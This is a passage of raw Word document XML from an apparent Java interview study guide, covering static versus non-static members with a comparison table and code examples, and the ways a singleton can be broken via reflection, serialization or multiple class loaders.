      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between static and non-static in java</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="5126170B" w14:textId="5B532485" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D181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001"/>
        <w:gridCol w:w="3540"/>
      </w:tblGrid>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="267F13CA" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D4ED5A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467BE5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6AFDD270"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8D1816" w:rsidRPr="00CE4B95" w14:paraId="30089F36" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="742705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17F88C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the static keyword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3530E68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keyword used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="0960FE21" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55D0B01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420105A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 Only one copy of the static member exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C43A01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instance of the class gets its own copy of non-static members.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="41B1E877" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6901E9D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chanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0973C8C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using the class name (ClassName.member) or through an object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39E92EB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through an object of the class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="65E95ADB" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="612FE9B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Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0626963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require an object instance to be accessed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="115E3379"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object instance to be accessed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="5A37C392" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="444F82B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395663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variables are initialized only once and are shared among all instances.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="422D2D8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initialized for each instance individually.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="7FC3B47A" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28568E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1BAE7BD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part of the class's memory).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FD1D42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each object has its own copy).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="77429EFB" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11EF98E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nvocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FC9445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be called directly using the class name.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="574E709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must be called through an object instance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="076D487C" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51D9F79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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31FD731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 (in terms of dynamic method dispatch) but can be hidden (by re-declaring in a subclass).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63351B8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can be overridden in subclasses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="51EA74E8" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0682730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cycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5582721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as long as the class is loaded in memory, even if no object is created.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="085F7A7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only as long as the object exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="09620CDD" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A93D94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50328F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functionality that is independent of instance-specific data (e.g., utility methods, constants).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6547AA6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instance-specific functionality (e.g., instance data manipulation).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1194380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3631C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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00211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162645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int staticCount = 0; // Static field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B02132" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF636D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A3950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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739A252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Count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B905F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9A4DCE" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A7D5F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FC74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tatic member directly using class name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1D9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increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626AC7E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count: " + Example.staticCount); // Output: Static count: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582E0A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024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B3572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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E24158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95A3D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nstanceCount = 0; // Non-static field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF60DC" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B63AB3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n-static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AD42C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increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7197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Count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC9CAE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7A7289" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2688D19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DDE6F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1 = new Example();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3AD9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2 = new Example();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5825DF" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B19A9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increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F83F87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increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DEF2FD" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181C8D4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1: " + obj1.instanceCount); // Output: Instance count for obj1: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64587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2: " + obj2.instanceCount); // Output: Instance count for obj2: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A3690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00D07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49B5F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p w14:paraId="7ED783CF"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Shared by all instances of a class, whereas </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-static variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are specific to each instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE89D14"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 be called without creating an object of the class, whereas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require an object to be called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DECBEC"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not access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directly, while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can access both static and non-static variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68421DC2"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B7C9396"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there is only one copy of a static member shared across all instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0536C1DB"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members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> belong to each instance of the class, and each object has its own copy of these members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D88A7" w14:textId="5AAEC383"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="615676F0" w14:textId="0379B584" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB2AAE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc197867270"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can we break the singleton pattern</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="5DCB0EF3" w14:textId="4B6588C2" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220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flection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD58B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D982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lang.reflect.Constructor;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F8A3E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C17330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110D90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5079BD1A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69586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00AB1E6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3FBAF7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ABCF7C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14436B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979B14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C9335B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68021B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9A55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7DB728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C51D41" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CFFFE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53CB0E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30030DD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035A169" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247DD92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reak Singleton using reflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B00031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lt;Singleton&gt; constructor = Singleton.class.getDeclaredConstructor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A823B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setAccessible(true);  // Allow access to private constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113285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constructor.newInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2B249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4426FB7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9B2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903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ven though the constructor of Singleton is private, we are able to create a new instance using reflection and break the Singleton pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366076A4"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rialization and Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB44BF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serialization (which converts an object into a stream of bytes), the Singleton pattern can be broken by creating a new instance during deserialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D238A2"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3D3A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59E57E1C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5423D1A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Serializable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2E2F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6FDD96C6" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22EE1C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3CDC36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7CD27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62A3A9" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572D443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E9FBAB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0C9EC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6D894A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F5CCD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5EC10B6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E0704D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7340FEA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Object readResolve() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7748B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event breaking the Singleton during deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D060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604CC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40ED73" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E258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437B4C0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6C1F812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FAA9741" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E79434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rialize the Singleton object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D15AF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OutputStream out = new ObjectOutputStream(new FileOutputStream("singleton.ser"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F276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writeObject(s1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C5B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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773568EE" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5707736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serialize and break the Singleton pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E3743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InputStream in = new ObjectInputStream(new FileInputStream("singleton.ser"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE19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in.readObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6446D4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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C600B62" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA168D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A new instance is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F1F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A08CB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43F8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ultiple Class Loaders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755F71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different class loaders can load the same class multiple times, creating different instances of the Singleton class. This can break the Singleton pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F56A19"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F430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EE71CC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348FB3B" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DAC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C152C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092282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1B94D2" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
